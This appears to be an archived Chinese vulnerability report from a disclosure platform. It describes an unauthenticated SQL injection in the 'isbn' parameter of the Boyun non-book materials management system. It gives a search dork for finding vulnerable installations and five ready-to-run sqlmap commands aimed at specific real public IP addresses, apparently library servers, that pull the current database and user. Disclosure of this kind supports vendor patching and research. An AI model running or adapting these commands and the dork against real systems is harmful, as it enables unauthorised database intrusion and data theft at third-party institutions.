某图书管理系统存在通用型SQL注入漏洞

### 简要描述： ... ### 详细说明： 系统名称：博云非书资料管理系统 厂商信息：杭州麦达电子有限公司版权所有 该系统有个特别 高大上 的功能：“云中心查找”功能 [<img src="https://images.seebug.org/upload/201412/10221606003182ce1b0380d228a1e88ef621938a.jpg" alt="QQ图片20141210221532.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10221606003182ce1b0380d228a1e88ef621938a.jpg) 恰好这个查找的链接的参数存在sql注入漏洞，且该功能无需登录。 百度搜索：inurl:poweb 非书资料管理系统 罗嗦到这里，看证明吧 -------------------------------- 下面的漏洞证明，直接给出“云中心查找”功能得出链接（只要是该系统，都存在查找的功能，且无需登陆到系统中），链接类似于 http://www.xxoo.com/poweb/findisoforjson?callback=C&isbn=xxx-x-xxxx-xx&uri=www.xxoo.com/poweb&date=&_xx1418215264814=1 漏洞参数 isbn 1# http://210.32.137.198/ ``` C:\Users\Administrator>sqlmap.py -u "http://210.32.137.198//findisoforjson?callb ack=C&isbn=978-7-115-33783-2&uri=210.32.137.198:80/&date=Wed%20Dec%2010%202014%2 020:20:39%20GMT+0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)& _xx1418214039443=1" --current-db --current-user ``` [<img src="https://images.seebug.org/upload/201412/10205213cf69a090fa8990afe30290ff8bd4a65f.jpg" alt="QQ图片20141210205156.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10205213cf69a090fa8990afe30290ff8bd4a65f.jpg) 2# http://202.38.93.29 ``` C:\Users\Administrator>sqlmap.py -u "http://202.38.93.29//findisoforjson?callbac k=C&isbn=*&uri=202.38.93.29:80/&date=Wed%20Dec%2010%202014%2020:41:04%20GMT+0800 %20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&_xx1418215264733=1" --dbms=mssql --current-user --current-db ``` [<img src="https://images.seebug.org/upload/201412/10221902dd09b816cf2f32cc11383f2d61ddefd3.jpg" alt="QQ图片20141210221825.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10221902dd09b816cf2f32cc11383f2d61ddefd3.jpg) 3# http://61.175.198.137 ``` C:\Users\Administrator>sqlmap.py -u "http://61.175.198.137//findisoforjson?callb ack=C&isbn=*&uri=61.175.198.137:80/&date=Wed%20Dec%2010%202014%2020:41:04%20GMT+ 0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&_xx1418215264835 =1" --dbms=mssql ``` [<img src="https://images.seebug.org/upload/201412/102230245eaa450507d91c5a74c13393d93a81dc.jpg" alt="QQ图片20141210223004.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/102230245eaa450507d91c5a74c13393d93a81dc.jpg) 4# http://222.29.253.58:8080/poweb ``` C:\Users\Administrator>sqlmap.py -u "http://222.29.253.58:8080/poweb/findisoforj son?callback=C&isbn=*&uri=222.29.253.58:8080/poweb&date=Wed%20Dec%2010%202014%20 20:41:04%20GMT+0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&_ xx1418215264827=1" --dbms=mssql --current-db ``` [<img src="https://images.seebug.org/upload/201412/10230148fb080a268f2012ade8abd22cd87ca327.jpg" alt="QQ图片20141210230112.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10230148fb080a268f2012ade8abd22cd87ca327.jpg) 5# http://222.29.253.58:8080/poweb/ ``` C:\Users\Administrator>sqlmap.py -u "http://222.29.253.58:8080/poweb/findisoforj son?callback=C&isbn=*&uri=210.38.64.114:85/poweb/&date=Wed%20Dec%2010%202014%202 0:41:04%20GMT+0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&_x x1418215264716=1" --dbms=mssql --current-user ``` [<img src="https://images.seebug.org/upload/201412/10231131b5d4a70a314f721334c851b975d871c6.jpg" alt="QQ图片20141210231057.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10231131b5d4a70a314f721334c851b975d871c6.jpg) …更多… ### 漏洞证明： ...